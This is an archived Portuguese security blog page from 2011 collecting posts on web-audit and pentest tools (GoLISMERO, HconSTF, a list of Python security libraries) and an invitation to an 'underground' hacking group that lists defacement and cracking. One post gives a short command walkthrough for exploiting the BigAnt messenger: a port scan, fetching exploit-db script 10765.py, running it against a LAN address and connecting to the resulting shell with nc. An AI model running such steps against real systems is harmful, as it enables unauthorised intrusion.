banner468

Mostrando postagens com marcador Hack. Mostrar todas as postagens
Mostrando postagens com marcador Hack. Mostrar todas as postagens

sexta-feira, 16 de dezembro de 2011

GoLISMERO - Simplificando suas auditorias Webs

O que é GoLISMERO?
GoLISMERO é uma web spider capaz de detectar as vulnerabilidades e os resultados formados, muito útil quando se inicia uma auditoria web.

Para que serve?
GoLISMERO pretende ser um primeiro passo ao iniciar uma auditoria de segurança web.

Características
  • Mapear uma aplicação web.
  • Mostrar todos os links e params formas como formato confortável.
  • Salvar os resultados com alguns formatos: texto, cvs, html, raw(para analisar com bash script) e wfuzz scripts.
  • Detectar vulnerabilidades comuns de aplicação web.
  • Informações web filtro retendo apenas o que é importante.
  • Muitos outros recursos que você pode encontrar muito útil.

Toda vez que enfrentamos uma nova URL, não seria ótimo ter fácil e rápida todos os links, formulários com parâmetros, para detectar possíveis URL vulnerável, além de ser apresentada de forma que nos dá uma idéia de todos os pontos de entrada onde poderíamos lançar ataques? GoLISMERO nos permite fazer tudo isto.
Pagina do autor: http://www.iniqua.com

Aprendendo com exemplos
Abaixo estão alguns exemplos e estudos de caso, que são a melhor maneira de aprender a usar uma ferramenta de segurança.

Ficando todos os links e as formas de uma web, com todos os seus parâmetros, formato estendido:

GoLISMERO.py –t google.com

Mostra todos os links em modo compacto, e colorido as output(saída):
GoLISMERO.py –c –m –t google.com

Mostra apenas os links. Remover css, javascript, imagens e e-mails:
GoLISMERO.py --no-css--no-script --no-images --no-mail –c –A links –m –t google.com

Ou de uma forma reduzida:
GoLISMERO.py –na –c –A links –m –t google.com
Remover apenas os links que têm parâmetros, e siga redirecionamentos(HTTP 302), e os resultados de exportação em HTML:
GoLISMERO.py –c –A links --follow –F html –o results.html –m –t google.com
Gerando sainda em HTML:
Extrair todos os links, procurando URL potencialmente vulneráveis ​​e usar um proxy intermediário para análise. Parâmetros de URLs ou vulneráveis ​​são destacadas em vermelho.
GoLISMERO.py –c –A links --follow -na –x –m –t terra.com
Veja o resultado com o ZAP Proxy:

Baixar: https://code.google.com/p/golismero/downloads/list

terça-feira, 13 de dezembro de 2011

HconSTF - Hcon Security Testing Framework [Fire Base & Aqua base]


São duas ótimas ferramentas para profissionais de segurança, modificadas em dois navegadores, no Firefox(fire base) e no Chromium(aqua base).

Hcon Security Testing Framework "Fire Base"


O que ele pode fazer?
A maior parte do HconSTF é semi-automatizado, mas você ainda precisa de seu cérebro para trabalhar com isso.
Ele pode ser usado no desenvolvimento web/depuração(debugging) e todas as fases de testes de segurança de TI, tem ferramentas para
1. coleta de informações
2. Enumeração & Reconnaissance
3. A avaliação da vulnerabilidade
4. exploração
5. Escalação de privilégios
6. Reportagem

Info versão:
Versão atual: 0.3
Tipo: portátil (não precisa instalar, executado a partir de pendrive ou qualquer cartão de memória)
Plataforma: Windows XP, Vista, 7

Termos de uso:
Ao utilizar este software você concordou com os termos de uso deste software
Devido à natureza do software, se for utilizado em qualquer atividade ilegal ou crime cibernético, em seguida, o autor do software ou o site não é responsável em qualquer condição.
você, como usuário deste software é responsável por seus atos.

Baixar: http://www.hcon.in/downloads.html

Hcon Security Testing Framework "Aqua base"



Epecificação:

1. Com base em fonte de Chromium Source (iron build) versão 14
2. mais seguro e rastreamento gratuito do Google Chromium
3. Mais de 100 ferramentas de integração com interface de uso muito fácil
4. sugestões contribuíram fortemente, sendo modificadas por pentesters profissionais, desenvolvedores web, pesquisadores de segurança
5. Livre e de código aberto
6. Totalmente portátil (não precisa instalar), você pode carregá-lo na sua usb cartão de memória, etc,
7. Funciona em todas as janelas incluindo janelas - XP, Vista, 7

neste projeto chrome OS, todos os ícones usados ​​são de propriedade de seus detentores dos direitos autorais.
apenas o logotipo da HconSTF (ícone) é propriedade da Mistry Ashish sob o nome de HCON.

Baixar: http://www.hcon.in/downloads.html

Quer contribuir?
1. Se você é um bom javascript, HTML, XML desenvolvedor
2. designer gráfico
3. se você pode fazer os primeiros testes
4. Se você tiver quaisquer idéias, sugestões para melhorar HconSTF
contate:
http://www.hcon.in/contact-us.html

sábado, 11 de junho de 2011

Ferramentas Python para testes de penetração

Se você está envolvido na investigação da vulnerabilidade, engenharia reversa ou teste de penetração, eu sugiro experimentar o Python linguagem de programação. Possui um rico conjunto de bibliotecas e programas úteis. Esta página lista alguns deles.

A maioria das ferramentas listadas são escritos em Python, outros são apenas ligações Python para as bibliotecas existentes C, ou seja, eles fazem essas bibliotecas facilmente utilizáveis ​​em programas Python.

Network

  • Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library
  • pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap
  • libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission
  • dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols
  • Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB
  • pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection
  • Dirtbags py-pcap: read pcap files without libpcap
  • flowgrep: grep through packet payloads using regular expressions
  • httplib2: comprehensive HTTP client library that supports many features left out of other HTTP libraries
  • Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist
  • Mallory, man-in-the-middle proxy for testing
  • mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly

Debugging and reverse engineering

  • Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH
  • Immunity Debugger: scriptable GUI and command line debugger
  • IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro
  • PyEMU: fully scriptable IA-32 emulator, useful for malware analysis
  • pefile: read and work with Portable Executable (aka PE) files
  • pydasm: Python interface to the libdasm x86 disassembling library
  • PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine
  • uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory
  • diStorm64: disassembler library for AMD64, licensed under the BSD license
  • python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python

Fuzzing

  • Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components
  • Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing
  • antiparser: fuzz testing and fault injection API
  • TAOF, including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer
  • untidy: general purpose XML fuzzer
  • Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer)
  • FileP: file fuzzer. Generates mutated files from a list of source files and feeds them to an external program in batches
  • SMUDGE
  • Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns
  • Fuzzbox: multi-codec media fuzzer
  • Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems
  • Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms
  • WSBang: perform automated security testing of SOAP based web services
  • Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner
  • fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano
  • Fusil: Python library used to write fuzzing programs

Web

  • ProxMon: processes proxy logs and reports discovered issues
  • WSMap: find web service endpoints and discovery files
  • Twill: browse the Web from a command-line interface. Supports automated Web testing
  • Windmill: web testing tool designed to let you painlessly automate and debug your web application
  • FunkLoad: functional and load web tester

Forensics

  • Volatility: extract digital artifacts from volatile memory (RAM) samples
  • SandMan: read the hibernation file, regardless of Windows version
  • LibForensics: library for developing digital forensics applications
  • TrIDLib, identify file types from their binary signatures. Now includes Python binding

Malware analysis

  • pyew: command line hexadecimal editor and disassembler, mainly to analyze malware
  • Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content
  • pyClamAV: add virus detection capabilities to your Python software
  • jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities
  • yara-python: identify and classify malware samples

PDF

  • Didier Stevens' PDF tools: analyse, identify and create PDF files (includes PDFiD, pdf-parser and make-pdf and mPDF)
  • Opaf: Open PDF Analysis Framework. Converts PDF to an XML tree that can be analyzed and modified.
  • Origapy: Python wrapper for the Origami Ruby module which sanitizes PDF files
  • pyPDF: pure Python PDF toolkit: extract info, spilt, merge, crop, encrypt, decrypt...
  • PDFMiner: extract text from PDF files
  • python-poppler-qt4: Python binding for the Poppler PDF library, including Qt4 support

Misc

  • InlineEgg: toolbox of classes for writing small assembly programs in Python
  • Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging
  • RevHosts: enumerate virtual hosts for a given IP address
  • simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API
  • PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools
  • Hachoir: view and edit a binary stream field by field

Other useful libraries and tools

  • IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system
  • Beautiful Soup: HTML parser optimized for screen-scraping
  • matplotlib: make 2D plots of arrays
  • Mayavi: 3D scientific data visualization and plotting
  • RTGraph3D: create dynamic graphs in 3D
  • Twisted: event-driven networking engine
  • Suds: lightweight SOAP client for consuming Web Services
  • M2Crypto: most complete OpenSSL wrapper
  • NetworkX: graph library (edges, nodes)
  • pyparsing: general parsing module
  • lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language
  • Pexpect: control and automate other programs, similar to Don Libes `Expect` system
  • Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython
  • PyQt and PySide: Python bindings for the Qt application framework and GUI library
Para mais libaries, por favor dê uma olhada no PyPI , o Python Package Index.
Dirk loss

sábado, 21 de maio de 2011

Explorando falha no BigAnt


O BigAnt é um software voltado para o uso em empresas, pois ele basicamente é um mensageiro instantâneo no qual o administrador da rede cria um servidor, cria todas as contas que poderão acessá-lo, definindo suas permissões de acesso e senhas, e integra a comunicação dos seus funcionários, não importando o tamanho da sua empresa. Além disso, todas as mensagens trocadas são criptografadas, ou seja, não haverá perigo de alguém roubar informações confidenciais através de uma conversa entre gerentes, por exemplo.

Ao baixar o BigAnt existirão dois arquivos, um é o mensageiro em si e o outro é o console, ou seja, o servidor pelo qual o administrador controlará o andamento das coisas. Instale ambos. A primeira coisa a ser feita é rodar o console e criar um servidor, grupos e usuários. Ao executar o console clique em “demo” para assistir a um vídeo demonstrando o funcionamento básico dele.

Usuários

Depois repasse o IP e nome de usuário e senha para aqueles que venham a utilizar o seu servidor. Por fim, basta inserir esses dados no “messenger” e usá-lo como se fosse o Windows Live Messenger, pois ambos funcionam de maneira muito similar.

Agora que sabemos... vamos a arte da exploração. :)

Ferramentas usadas: 

Comandos:
nmap -p 1-9999 192.168.1.102
cd /pentest/exploits/exploit-db
./searchsploit bigant
cp platforms/windows/remote/10765.py /root/
cd /root/
python 10765.py 192.168.1.102
nc 192.168.1.102 4444

Sobre a aula:
Tamanho: 34 Mb
Formato: AVI
Duração: 3:14
Musica: The Marcels - Blue Moon


quarta-feira, 13 de abril de 2011

Brasil Underground - Grupo brasileiro de informática hacker

                           Brasil Underground


Convido os leitores do blog a participar de um grupo de discussão sobre informática hacking e afins.
Serão abordados todo tema relacionado a segurança digital:

Teste de intrusão
Defacement
Engenharia reversa
Engenharia social
Cracking
Programação
Phreaker 
Etc...

Ingresse no grupo através desse link:
https://groups.google.com/group/brasil-underground?hl=pt

Para todos que tiverem a  intenção de aprender e compartilhar seus conhecimento, lembrando que o conteúdo e restrito!

Administradores:

Wander Teixeira - http://www.exploit-h.org/
Marcos Pitanga
Clandestine - http://www.clandestine-ethicalforense.blogspot.com/
Kembolle Amilkar - http://www.kembolle.com.br/
Fabiano matias

quarta-feira, 25 de agosto de 2010

Acessando Phpmyadmin

 

Subscribe to our Newsletter

Contact our Support

Email us: youremail@gmail.com

Our Team Memebers